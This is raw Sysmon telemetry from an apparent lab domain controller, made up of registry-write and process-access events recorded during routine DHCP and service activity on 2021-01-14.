13241300x8000000000000000857Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.400{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\T1DWORD (0x60004990) 13241300x8000000000000000856Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.400{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\LeaseObtainedTimeDWORD (0x60004288) 13241300x8000000000000000855Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.400{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\LeaseDWORD (0x00000e10) 13241300x8000000000000000854Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.400{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpServer10.0.1.1 13241300x8000000000000000853Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.400{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpSubnetMask255.255.255.0 13241300x8000000000000000852Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.400{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpIPAddress10.0.1.14 13241300x8000000000000000851Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.400{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpInterfaceOptionsBinary Data 13241300x8000000000000000850Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.400{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\DHCP\CollectionBinary Data 10341000x8000000000000000849Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.400{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-0E00-000000009A01}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000848Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.400{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\DHCP\CollectionBinary Data 10341000x8000000000000000847Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.400{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-0E00-000000009A01}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000846Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.400{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\DHCP\CollectionBinary Data 13241300x8000000000000000845Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.400{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\Dhcpv6StateDWORD (0x00000001) 13241300x8000000000000000844Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.400{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\Dhcpv6StateDWORD (0x00000000) 13241300x8000000000000000843Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.385{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\DHCP\CollectionBinary Data 10341000x8000000000000000842Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.385{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000841Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.385{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000840Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.338{08A6967A-4286-6000-0A00-000000009A01}8441184C:\Windows\system32\services.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000839Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.338{08A6967A-4287-6000-0C00-000000009A01}588640C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000838Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.338{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4288-6000-0F00-000000009A01}1124C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000837Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.338{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4288-6000-0F00-000000009A01}1124C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000836Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.338{08A6967A-4286-6000-0A00-000000009A01}8441184C:\Windows\system32\services.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000835Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.338{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000834Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.338{08A6967A-4288-6000-0E00-000000009A01}10761336C:\Windows\system32\LogonUI.exe{08A6967A-4286-6000-0900-000000009A01}800C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\logoncontroller.dll+2dfb5|C:\Windows\System32\RPCRT4.dll+50d64|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000833Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.338{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000832Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.338{08A6967A-4286-6000-0A00-000000009A01}8441112C:\Windows\system32\services.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+52f1|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000831Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.338{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000830Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.338{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000829Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.338{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000828Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.338{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000827Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.338{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000826Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.338{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000825Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.322{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000824Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.322{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000823Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 